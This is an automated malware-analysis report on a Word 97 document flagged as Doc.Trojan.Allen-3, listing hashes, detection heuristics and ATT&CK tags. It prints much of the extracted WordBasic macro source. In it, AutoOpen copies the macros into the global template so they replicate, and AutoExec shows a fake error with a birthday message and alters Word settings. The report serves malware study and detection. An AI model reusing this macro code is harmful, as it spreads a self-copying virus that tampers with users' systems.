Office (OLE) malware analysis — malicious · 976ccbbabc12620f

MALICIOUS

Office (OLE)

43.5 KB Created: 1997-10-01 12:36:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 77244ac20bb440686445d61f26538c9e SHA-1: e2f31e6cc9471cbc290ab0ed4ce140650d41529d SHA-256: 976ccbbabc12620fe58a7cdcdebfa4056d2077c9d6b613a6a582ad9068a761aa

220 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as a malicious Word 97 document containing legacy WordBasic macros, specifically triggering the AutoOpen macro. The macro's content appears to be a birthday message, but the presence of legacy macro virus markers and ClamAV detections (Doc.Trojan.Allen-3) strongly suggests malicious intent, likely to execute further payloads or perform other harmful actions upon opening.

Heuristics 4

ClamAV: Doc.Trojan.Allen-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Allen-3
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6639 bytes
SHA-256: `98d6e7fe1e822d5512c274d500ac4937350e1e01d2281c91bb0e9e879d24463f`
Detection ClamAV: Doc.Trojan.Allen-3 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "AutoExec" Option Explicit Public Sub MAIN() Attribute MAIN.VB_Description = "Salam Kasih dari Edelweis-eth seorang bidak dan pencari yang tak tahu kapan akan temu dan sampai kapan harus menunggu" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "Normal.AutoExec.MAIN" Dim Tgl Dim Bln Dim Thn Dim Jam Dim Lebar Dim Tinggi Dim BarOK Dim LebOK Dim Pelaku$ WordBasic.DisableInput 1 WordBasic.DisableAutoMacros 0 Tgl = WordBasic.Day(WordBasic.Now()) Bln = WordBasic.Month(WordBasic.Now()) Thn = WordBasic.Year(WordBasic.Now()) Jam = WordBasic.Hour(WordBasic.Now()) Dim Pesan1$, Pelaku1$, Pelaku2$, Pelaku3$, Pelaku4$, Pelaku5$, Pelaku6$ Pelaku1$ = "Edelweis-eth" Pelaku2$ = "Ch. Sienna" Pelaku3$ = "My Sist" Pelaku4$ = "Rolly" Pelaku5$ = "Indonesia" Pelaku6$ = "Hastoe" If Thn < 1998 Then GoTo HUT If Jam < 0 Then GoTo Akhir HUT: If Tgl = 17 And Bln = 3 Then Pelaku$ = Pelaku1$ GoTo Ultah ElseIf Tgl = 24 And Bln = 4 Then Pelaku$ = Pelaku2$ GoTo Ultah ElseIf Tgl = 1 And Bln = 6 Then Pelaku$ = Pelaku3$ GoTo Ultah ElseIf Tgl = 24 And Bln = 10 Then Pelaku$ = Pelaku4$ GoTo Ultah ElseIf Tgl = 17 And Bln = 8 Then Pelaku$ = Pelaku5$ GoTo Ultah ElseIf Tgl = 7 And Bln = 12 Then Pelaku$ = Pelaku6$ GoTo Ultah End If GoTo Lanjut Ultah: Pesan1$ = "Hari ini " + Pelaku$ + " berulang tahun, maka matikan saja komputer anda, tinggalkan semua pekerjaan dan luangkan waktu untuk mengucapkan selamat ulang tahun pada " + Pelaku$ + "." WordBasic.Beep WordBasic.MsgBox Pesan1$, "#Err 6857-Selamat Ulang Tahun, " + Pelaku$ + "....#", 48 GoTo Ultah Lanjut: WordBasic.ToolsOptionsSave CreateBackup:=0, FastSaves:=0, SummaryPrompt:=0, GlobalDotPrompt:=0, NativePictureFormat:=0, EmbedFonts:=0, FormsData:=0, AutoSave:=1, SaveInterval:="5", Password:="", WritePassword:="", RecommendReadOnly:=0 WordBasic.ToolsOptionsGeneral Pagination:=1, WPHelp:=0, WPDocNavKeys:=0, BlueScreen:=0, ErrorBeeps:=1, Effects3d:=1, UpdateLinks:=1, SendMailAttach:=1, RecentFiles:=0, RecentFileCount:="", Units:=1, ButtonFieldClicks:=-1 WordBasic.ToolsOptionsUserInfo Name:="Edelweis-eth", Initials:="AIES", Address:="Kau yang selalu kucari dimana kau??" + Chr(13) + "dalam gelap tak tertebak, dalam terang tak terlacak" + Chr(13) + "Tak juga dalam mimpi-mimpi malamku" + Chr(13) + "bahkan dalam kidung-kidung doaku yang selalu kukirimkan dengan hati hampa" + Chr(13) + "DIMANA KAU??" + Chr(13) Akhir: End Sub Attribute VB_Name = "AutoOpen" Option Explicit Public Sub MAIN() Attribute MAIN.VB_Description = "Salam Kasih dari Edelweis-eth seorang bidak dan pencari yang tak tahu kapan akan temu dan sampai kapan harus menunggu" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "Normal.AutoOpen.MAIN" Dim NFile$ Dim NMakro$ NFile$ = WordBasic.[FileName$]() On Error GoTo -1: On Error GoTo Akhir NMakro$ = NFile$ + ":AutoExec" WordBasic.MacroCopy NMakro$, "Global:AutoExec" On Error GoTo -1: On Error GoTo Akhir NMakro$ = NFile$ + ":AutoOpen" WordBasic.MacroCopy NMakro$, "Global:AutoOpen" On Error GoTo -1: On Error GoTo Akhir NMakro$ = NFile$ + ":FileOpen" WordBasic.MacroCopy NMakro$, "Global:FileOpen" On Error GoTo -1: On Error GoTo Akhir NMakro$ = NFile$ + ":FileSave" WordBasic.MacroCopy NMakro$, "Global:FileSave" On Error GoTo -1: On Error GoTo Akhir NMakro$ = NFile$ + ":FileSaveAs" WordBasic.MacroCopy NMakro$, "Global:FileSaveAs" On Error GoTo -1: On Error GoTo Akhir NMakro$ = NFile$ + ":FileTemplates" WordBasic.MacroCopy NMakro$, "Global:FileTemplates" On Error GoTo -1: On Error GoTo Akhir NMakro$ = NFile$ + ":FileMacro" WordBasic.MacroCopy NMakro$, "Global:FileMacro" On Error GoTo -1: On Error GoTo Akhir NMak ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.